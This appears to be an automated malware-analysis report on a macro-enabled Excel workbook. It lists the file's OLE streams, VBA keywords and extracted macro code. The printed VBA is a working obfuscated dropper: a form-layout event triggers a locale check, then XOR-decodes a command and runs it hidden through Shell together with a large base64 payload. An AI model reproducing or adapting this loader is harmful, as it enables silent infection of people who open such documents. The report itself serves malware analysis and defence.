Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 1286

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	1286
Data ASCII:	. . . . . . . . . J . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . < p . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . F r a m e 1 , 1 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . .
Data Raw:	01 16 03 00 00 10 01 00 00 4a 03 00 00 f4 00 00 00 20 02 00 00 ff ff ff ff 51 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 3c 70 e0 97 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Name
VB_Creatable
VB_Exposed
Frame"
VB_Customizable
ThisWorkbook.cobo
VB_Control
VB_TemplateDerived
MSForms,
False
Attribute
Private
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 1, 0, MSForms, Frame"

Private Sub Frame1_Layout()
ThisWorkbook.cobo
End Sub

VBA File Name: ThisWorkbook.cls, Stream Size: 22684

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	22684
Data ASCII:	. . . . . . . . . r . . . . . . . . . . . . . . . . . . . : 4 . . . . . . . . . . < p . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . & I ] . . . . J . . v 9 9 & . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . e [ o _ . . @ J . . . . < . M s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . e [ o _ . . @ J . . . . < . M s & I ] . . . . J . . v 9 9 & . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 00 01 00 00 72 0b 00 00 e4 00 00 00 10 02 00 00 a0 0b 00 00 ae 0b 00 00 3a 34 00 00 00 00 00 00 01 00 00 00 3c 70 e3 10 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 26 49 5d b9 91 e2 0f 4a b7 a0 76 39 39 26 a2 eb 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
BiS(LineCVharts,
ShowFormatTabs
"ThisWorkbook"
Byte,
Application.International(xlCountrySetting)
StopTabs
StopTabs()
vbUnicode)
Long,
LBound(Cuts)
Len(pp)
SensetiveLine
opa()
Ipl()
Val(sIn(i))
False
String,
String)
Split(Numk,
cobo()
BiS(ByVal
FarWd
String
ReDim
UBound(Cuts)
Ipl(LBound(sIn)
Shell#(StopTabs
Cuts(l)
LBound(sIn)
VB_Base
Len(Numk)
ByVal
LineCVharts
VB_Creatable
VB_Exposed
BraFalse()
StrConv(Ipl,
OwFormat()
Replace(""
UBound(sIn))
LineCVharts()
RefTargetd
OwFormat
Ipl(i)
tuf),
BraFalse
tuf()
Attribute
VB_PredeclaredId
StrConv(pp,
VB_GlobalNameSpace
tiga()
sIn()
UBound(sIn)
VB_Name
ShowFormatTabs()
Function
xlBinsTypeBinSize
vbFromUnicode)
Application.Quit
VB_Customizable
SensetiveLine()
BiS(StopTabs,
olecounter
VB_TemplateDerived
"currency"),
RefTargetd()
Cuts()

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Function BiS(ByVal Numk As String, ByVal pp As String) As String
Dim i As Long, l As Long, Ipl() As Byte, sIn() As String, Cuts() As Byte
If Len(Numk) = 0 Or Len(pp) = 0 Then Exit Function
sIn = Split(Numk, ",")
ReDim Ipl(LBound(sIn) To UBound(sIn))
Cuts = StrConv(pp, vbFromUnicode)
l = LBound(Cuts)
For i = LBound(sIn) To UBound(sIn) Step 1
  Ipl(i) = Val(sIn(i)) Xor Cuts(l)
  l = l + 1
  If l > UBound(Cuts) Then l = LBound(Cuts)
Next i
BiS = StrConv(Ipl, vbUnicode)
End Function


Function OwFormat()
OwFormat = "qy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mIP9tIhBT3RfRwrcNb1PwFxDpNZEnoOKAu7Df55hkg2RMuYzhCkAy4gltWKn6fTQvifLCg50HErnBQYu4IYgQ/0u0Bvztp+QNkFAfZl9EQ/NvNwqIOWCMoIKpAX6FA/iiA"
End Function
Function RefTargetd()
RefTargetd = "Ffj0gbu4+AshtTTAs7gw4MWoKsWMAuzTLJl9isR9yY3By9Jd6Nc22oiswTTMACfS1HOBHXTq6X7rXrSsPEiWum+mhxG5oRhZZlE7lH8V8KbkJ/FwSj4MerMD7cimWbdr0boBq2T8HCqyAuIZi5mSiGbYGNN5CRULDMjwXnJ7V30PUhGzrE4IWJNjOXlCEsuiVcwqrAt/JuCCmKbzGdT4qU+wuOVRX5ESU+GKzwBxmVGEEgVeSQTmrwcMsxDH2BeUNLMQlk355K3F0zsnxmoSDxcmeR/C/RCMDeBJCd62U8Aa4imSP74++CWIr4iKTyyK/lsO3wbYof1zE5UmxxnKAAiBn+/LXMcg8NSYSndjKSkBHYgNUlHzGQwFoTvZr8mbkKGEReA/R0UPPAjxkrBUfUaJ2XKlZkc3COq8pR+YmbduBFF8y9LpgbKSg42yUIZtM8jlFNk0PNOoJcCTXQDNETqPNKGqbzRLdPcvKgfjiypFxmVdMY8INshRplyE3EPRIINJQoXPzMD7iRdZHuYgsQwTrgCCgyh+fJoUVArigVBQrokupbB9ijQ9oFIjCNyOQ9kcmDCQehvlyEQeaosmyXJkhEYpAFXVbysJgMrB3e/lomoRxyPaQgNSTxaMfOJDTuqPIUEg/lWLLR0SaPlc05lNB14LxkBJD6sJrB5CwHMO0ylgPAS0/Hn4g2O+UYlibxJdOH3zemR7NouS4DFOBOhwRvULD0kfPh7+ihH/ILNffwp9r3o+0eZLzSL6fuR6wgNcryEkWRBEQdSc29msoB87MdiRSIsD2//DmFBH2dxGn/D0iDk2pQupapYzXmd++9PqD8S1ZQEFUT6JXeoTKhZjhBsi5Op0oLweiykigDLQ8subuuR96ZlKv+vDJeW1af0kNQIvutPZEozviTC4yxcjTxTRQ22KyKqVE82g0VJR8/h7s6YWhYc0xpFlc8dDzWmTy2Sh"
End Function
Function Col10LNn()
Col10LNn = "ap56gB8gJYTQ1uoNwuFuYJdxKn05pqHQrgqkr41262jMlka7ZTsYTNuSJmhSxxIPG4k+OTEHh+T/MZzy5lP3AyvrCVapeFHpWMQDCME28YNUECRaNIlB2RFwzAoCaDlLD2PcuPZtQbZoUdGKa6iH2n0fW5SA5iH3+RwFpMU/ADiJjHMGTxz+zh+2oJoCtWBhiYjEAZ30OdNMwP6Un/YrAmm2HdkpPsi+VVbF7V0lahrqCtUjyohPN5wTVFFukYNi4jeXRuyXmlGiUwBUNKulNPVhP2CnsQjgMEUTAHlWIfBTfVas5VXjUykX5bTd3goRxkwqsuboxjqQtpWALlt6fCbmDcrbPR1Kgll5w45J+pshaJoAhaiQ6tWH4vsqnL8UVSzROPCQlV8lFx0xDvpTAQ5HiHudRtBWAc5lUhS2flAsysaWEEohEwDFD7KO+4ZLFVTyAvw9qyRsln2sf1g7pBbp09ICm6ygH4cOi1jfhncVEG3ZeVed7o3EdH6HONXOoditjsgmdtqZNoiX5v0kQdwVHrkcgoP4a3aTXG3H8SCMwTcVINJEkzZZxliiuP24uGW7KTwlxfwn+DwKF3j1DtW1Mao5Khi8cDMVyLxSSPWFIbpwVbiW5FDikLPlfIy86vM7o4WCaso7IIS7F3mkH6kOgN0Wc1IcHVJPEn/TmcV96/YYFJHbYRKlo/y6Qh0S+/kxsSqhjZbXW/qyRLskamm+wTcqdphpkqtQGGzyATLkTfu44rwusSyUFita11ICOuqMVh7WoNX4Ua4ZRnqAppEMVRDdPu0hBolUYhUIXRQ584UdW0J5zBJjJCEJWpbBk9z6aUq0z2osOaKvOhTIRFRgqAgv5VjohNRw5VR+9Att0Eyo180q2V+wFm7vMM2DZJvDkOXKlgUk81uTUYyi9OfY50HamQFuTJZv7OoYJvAqHdnQdob9rohhYaIuClSGQK2D1G9WLUVFlMd"
End Function
Function BraFalse()
BraFalse = "LtuenKKqSKhEn5pDMHFzJcUfTjsTJFXk+2yG5GME1wgq6ldzFq3X0dmCwx3AZcAzEqL42h/DDhRclIr3Fdreafst99TAE8iSGKY5M7ADkZfQrcL0fhtZKVJdlpQmpwPPaPNkIYbRzb5fdCjcaDOdZtG5AlJtr3lai/jMkdjaoDs0gSqyjnLEUEd3no4H0vGSjiF9bMpjk4HrS751S5W3+eOtQyKsaDotNxeIKFbySj9DRMJecmOiJe3eeh9q3eyJxOkJo9OsboOs5a6OyPHQQeHTzIQlmsEpGn3iyy4ucW9yESUtYEBHqp7p+mQfURtKu6MfLJZgLeFWjrt2xICEQSFjTHdg1D6iPhUtlxm9EVcP/ZEkkptO18bmLs4jhtwdSV6RT0om/z9hCBMHW4cBXzFXA3f0092cJh9n/OFwnFENMTKasxEbiMxiUdfMqFbcxlUaJ5EqG+4EsI3AXjPTyeNiYLjkJDREySwfoqeq9URkkFGq4T/ItX5ZUWXmayISymRGkh/rpM0S9gIMyDjhA2FLqq6yZcwyZUaI0b719LLzfUAybSjLSQFmox8ERwUjK7F6edSSid1HcZFOxzha4RIJrjVfmjA5O42B4R+HnVgz67furEgu1qCpMX06OkxthZU+8oEmbcEpwx3eZusQfCcNDMPhsR5Ykd/AlUESdAQrNCR7wqLGoIgFyDs3VJFaxI0j6g+hkaeRsahSlwT3isTYLxOoOHNqhAL8N9FmtrvfioO5RSyNt6vB4A1B6C2nphEpn6JpSNaQC0L7S2awkmhXjEOK+zfNqCIXZLI5SbmrRRbjSYZFdtv4UWeK/qd3uopHqt8amshtqUflyfCwwVJzmL2lgJ5QTGwEV3c8KZOv4XqMW956YUynuWGa1Nzs6M0WnVFFXz85kOlDgNn7oFo74UNibjotFdoQjcK4rH7r2bQQX5W6CMFxIuBAoWkgpW6VO9"
End Function
Function leverpoolS5()
leverpoolS5 = "sOWA1GkgpStTKH2ruEIbpFdfjUdzQt24eoQdqgAbpp3mQ6BFQmpCLiAJdGVjsraMZ0R6t3xf7Ez9PhL85FRFbT41IGyZemmZPm10ncsj4iyIOFlT7oHgLqVAtyiVv1x0HUAg5GDzGL6VgyZXjFKcHnlxEpH7SouUJN+3La8sVtjFCYybMbgk33B1zsWP0q9zzysjUdbVM1OaZbuCUNlWOmPzVTeOt9JjhdD2DEd3Opyjh1sqOV+yY6ZKBanX0xTAigLXdQWI5XhYEoYKpXB0XzXDEdq8nd0V9lSpGpKnT21vyrNfwZtbeyB92/usaAnahjoQSXIuvZRx/62BHJ3DRRjUnXOMNmjb4oS2bsTKrrHcsqE3uGWNzFSeI1pfS3Yb+Oo/MB8bhi+zMgKiR/aOUU73XcppsaGHLU0HrdXmL5ZE7O1xHKcQ9BeRg9PD1M78w7ZK5TKiSg50iiGAi2daoy7ned9TXNP+1Wz/2cee5zzYEyiipawlJzLOo7N0OiRUatwoXyJcpFX1FwdYPRf2cY3E70K9sTnCCpFAEoWly5eViBqftQ1a5Z0f5bNkW3WxnxD39PfaZ0YhU+rRCsHWHOpgxMguQqJgnt1eLhFMCk6un+KpNfEFu3BHdd0YOuqPRW9MaYT/BGzd2jC7teFoumd/RIooWs/tdQ43q6GxmTtbg809jtsner8AcgwXlE9UNAtMNfxRugCq5Kgzz7jCtCjpHh5kh2D7Jp/hUc/TbdHsUOoop9Mk33bMu4DyQZfbmZfUVj73YlsY/bbBDSrec/voFz2jAeZ99KnCV00bkpE23E04s63SHfSXFwKYGXkBbigaZrKe44cLLnfmcUUxyHOQVOj4aq9IXInd01D9tJCWxiNH1+xQUHqxkeFvEkIpovWbDUD8bPzFuagWQLCDQ4I+tgaTakq6aXtJb98dJ1zPhlMs+PazQknLqnQcMGYGbBTYERlxYkf"
End Function
Function tiga()
kega = "qIYZn9Ht2um2m0iwVt4AA4ggYomdM56/MY2iQYuwNs8c4xuvFnD6gRhxnG1q+gpLTtjsMA6Ierk4kloEe6HL9aRgOh/shc1Mnu7FHFEsO7bmDBQ3LjROTzBZTBPdbbOKKsfFTWv6HTyMkmO3HbrWqGS2npvPS1OO4EXuzHuFL2FSAynlMeUPGpcwlL2fUe7pjr29kJxlQN35WaDzD29+JzgHRedSug6xirvFY0neHRMhxj9O5N7JcPYGgIEP3LKMk8LmTgce/XDbmoUFO/8wyIrGnRF49sVPlSnyPdTWIMzbrqCh83Qxwvq1sCj8Ju3p263QN4pSek6kf2K/OcggmF84+HSlJTXODz+U7XEtPNxAHDkkbJDtFTEx8Fd72gFn77dSgC7VCXjc6vHtzbJdj0GHr61Fq3dag7OcZEupjYqzWtWe1C3SYdhBpUHuC81vDyT8Cp9nCyk2jlbXjzBmlH1ORRccevKACeO99EFUUeekaN1gESmt0OuVKyQCjxZ6V5b04nqphnvlGkGdG5I6LUwrmu7aeV2svPpj8jtIsMRczxdQfCNw/dJtxb0BYnYXVk2nZfTu8LNWlN3TxDY1dcH/JabHwLKINn60byPed3XTtLlfqpvGHZYYhn3yZnwjlFPJDpLzHZkj+4ozmie5TOYCn3N3w4x+YhrCbxcePmKbHaLxh2bV8nifDlmhYOX79As7OmUQkSBB6cuUl7y6dGMcLXNcRT5P2YVxFOTpWGBdrm6V4HQo+6l0CbkOSZRS0WUvHgvVH0aKUcBmfvXhaTkgqxfH+Z2tgyLqzvqEEFBM8UlsgRYu+7jFtV9Fijsm/Eyi5MUVESxzokrwKSpaSklweDxZVVrxE2WO5KCbKGmxz79fm7qbnnx/1NFVGzHdKuJ9+q2WvY9+dptMIAvgruzohvn0GPsdc8UfVLcrqSODJ6WBL58M+pj/2He7+g846X7gfB6dTF4rnYzinSTn"
egak = "SZCSUSdQxNB0jSdR2jWPZ0lNFVf9pJSDfzrYs477+UuEreRSmSc0wkO5c+vNKJsKVAlN/ddPoTIX76bBsOvD5sd5aoAhu79t2Kdf7sjzWrtjtlyP4d3Gl9KW+de/687TUkuEQw5d1N5MDzRm84m2pHuNXXJiob70vQE3+KOBKFjyaGbPLbZfkL/9ks+p//+7Y//+usPv/v6y59//P1Xv/vlP+m7v3z9wzffp0+/+XP68sdvf/4mfZH/3X78In3+3+f0+XP6P"
olecounter = kega + egak
tiga = OwFormat + RefTargetd + Col10LNn + BraFalse + leverpoolS5 + olecounter
End Function
Function SensetiveLine()
If opa > xlBinsTypeBinSize * 347 - 1.07 Then ShowFormatTabs Else Application.Quit

End Function
Function StopTabs()
StopTabs = "31,17,24,124,115,63,124,126,47,57,8,124,124,17,4,19,97,124,2,122,124,116,116,59,10,124,123,118,49,56,14,118,123,117,114,18,29,17,25,7,111,112,109,109,112,110,1,113,54,19,21,50,123,123,117,116,124,50,57,11,113,51,30,54,57,63,8,124,21,19,114,31,51,49,44,46,25,47,47,21,19,18,114,24,57,26,48,29,40,57,47,40,46,57,61,17,116,7,53,19,114,49,57,49,51,14,37,15,40,14,25,29,49,1,124,7,31,19,50,10,57,14,40,1,102,102,58,14,19,49,62,29,47,25,106,104,15,8,46,53,18,27,116,124,123,10,10,44,62"
StopTabs = BiS(StopTabs, tuf)

End Function
Function LineCVharts()
nio = "43,97,97,123,124,117,112,124,7,15,37,15,8,25,17,114,21,19,114,63,51,49,12,14,25,47,15,53,19,50,114,63,51,49,44,46,57,15,15,53,51,50,17,19,24,25,1,102,102,24,25,63,51,17,44,46,57,47,15,124,117,124,2,32,124,26,19,14,57,61,63,52,39,50,57,11,113,51,30,54,57,63,8,124,21,19,114,15,8,46,57,61,49,46,57,61,56,25,46,116,120,3,112,124,7,15,37,15,8,57,49,114,8,25,36,40,114,57,50,31,19,24,21,18,59,1,102,102,61,15,63,21,53,117,124,33,2,32,26,19,46,25,29,63,52,124,39,120,3,114,46,25,61,56,8,51,57,50,24,116,117,33,124,117,124,122,122,124,44,51,43,57,14,15,52,57,16,16,124,124,113,11,53,50,56,19,11,15,8,37,48,25,124,124,20,21,56,24,25,50,124,124,113,18,19,18,53,18,40,57,14,29,31,124,124,113,18,51,12,46,19,58,21,48,25,124,113,18,19,16,124,124,113,57,36,57,31,9,40,124,124,62,5,44,29,15,15,124,124,47,42,124,124,116,124,123,37,9,31,123,119,124,123,105,123,124,117,124,116,124,7,40,37,44,25,1,116,0,126,39,108,33,39,111,33,39,110,33,39,109,33,0,126,113,26,124,123,57,123,112,123,57,18,40,123,112"
ios = ",123,53,46,51,50,49,123,112,123,50,42,123,124,117,124,124,117,124,124,124,124,103,120,39,25,4,25,31,9,8,21,19,50,31,51,18,40,25,4,40,33,114,0,126,21,18,42,51,23,25,63,51,60,49,17,61,60,18,24,0,126,114,0,126,21,50,42,51,60,23,25,47,60,31,14,21,12,8,0,126,116,124,124,124,116,124,124,116,124,124,124,21,8,57,49,124,124,116,124,124,123,42,29,123,119,124,123,14,53,61,30,48,123,124,124,119,124,124,123,25,102,123,124,119,123,5,41,31,105,123,124,124,117,124,124,117,114,10,61,48,9,25,102,102,116,124,124,0,126,39,104,33,39,105,33,39,110,33,39,108,33,39,106,33,39,111,33,39,109,33,0,126,124,113,58,123,49,57,123,112,123,25,123,112,123,51,50,123,112,123,46,21,61,62,48,123,112,123,59,25,8,57,50,42,53,123,112,123,14,123,112,123,50,8,10,61,123,124,124,117,114,21,50,42,51,55,57,116,123,17,4,19,123,112,116,124,124,0,126,39,109,33,39,108,33,0,126,113,58,123,47,123,112,123,12,46,51,31,25,15,123,124,124,117,124,117,124,124,117,124,124,124,124,117,126"
LineCVharts = nio + ios
End Function

Function opa()
opa = Application.International(xlCountrySetting) + 960
End Function
Function tuf()
tuf = Replace("" + Format(0, "currency"), "0", "")
End Function

Function ShowFormatTabs()
FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)
End Function


Sub cobo()

SensetiveLine
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	107
Entropy:	4.18482950044
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	228
Entropy:	2.77292456688
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 0 1 9 _ 0 2 _ 0 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8f 00 00 00 02 00 00 00 a4 03 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 136

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	136
Entropy:	2.99220796248
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . X . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . D . . . . . . . P . . . . . . . . . . . . . . . . . . . @ . . . . ~ . . . . . . @ . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 00 00 00 04 00 00 00 01 00 00 00 30 00 00 00 0c 00 00 00 38 00 00 00 0d 00 00 00 44 00 00 00 13 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a4 03 00 00 40 00 00 00 80 7e ed 1c f4 cc d4 01 40 00 00 00 00 1d 8c f3 0a cd d4 01

Stream Path: MBD0007D068/\x1CompObj, File Type: data, Stream Size: 112

General
Stream Path:	MBD0007D068/\x1CompObj
File Type:	data
Stream Size:	112
Entropy:	4.6011544911
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD0007D068/f, File Type: data, Stream Size: 124

General
Stream Path:	MBD0007D068/f
File Type:	data
Stream Size:	124
Entropy:	4.03315619285
Base64 Encoded:	False
Data ASCII:	. . 8 . F . . . . . . . . . . . . @ . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . F r a m e 1 . . . R . . . . . . . . . . . K . Q . . . . . . t . . . . . l . r . o . S . V . b . N . . . . . . . . . . . . . . . . . . Q . . .
Data Raw:	00 04 38 00 46 0c 1c 08 0e 00 00 80 0e 00 00 80 04 40 00 00 0e 00 00 80 06 00 00 80 ff ff 00 00 00 7d 00 00 a7 01 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 46 72 61 6d 65 31 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 80 00 00 90 01 74 b7 01 00 0f 82 6c 82 72 20 82 6f 83 53 83 56 83 62 83 4e 00 00 00 00 00 00 00 00 00 00 00 02 08 00 01 00 00 00 51 df 01 00

Stream Path: MBD0007D068/o, File Type: empty, Stream Size: 0

General
Stream Path:	MBD0007D068/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61928

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	61928
Entropy:	7.47732293774
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . S t e f a n B . h l m a n n B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . D C . . 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 0f 00 00 53 74 65 66 61 6e 20 42 fc 68 6c 6d 61 6e 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 496

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	496
Entropy:	5.17895604492
Base64 Encoded:	True
Data ASCII:	I D = " { B B 8 4 A B A 5 - 3 9 F D - 4 2 3 3 - A F 4 E - 0 5 9 F 8 1 9 0 3 F 2 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 0 F 2 1 F E 5 2 5 E 5 2 3 E 5 2 3 B 5 2 3 " . . D P B = " A 4 D 6 3 B 2 1 A A 0 4 F C 0 3 F C 0 4 " . . G C = " B 8 B C 5 7 A 8 5 8 A 8 5 5 5 7
Data Raw:	49 44 3d 22 7b 42 42 38 34 41 42 41 35 2d 33 39 46 44 2d 34 32 33 33 2d 41 46 34 45 2d 30 35 39 46 38 31 39 30 33 46 32 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	62
Entropy:	3.05546715432
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3485

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3485
Entropy:	4.4808811447
Base64 Encoded:	False
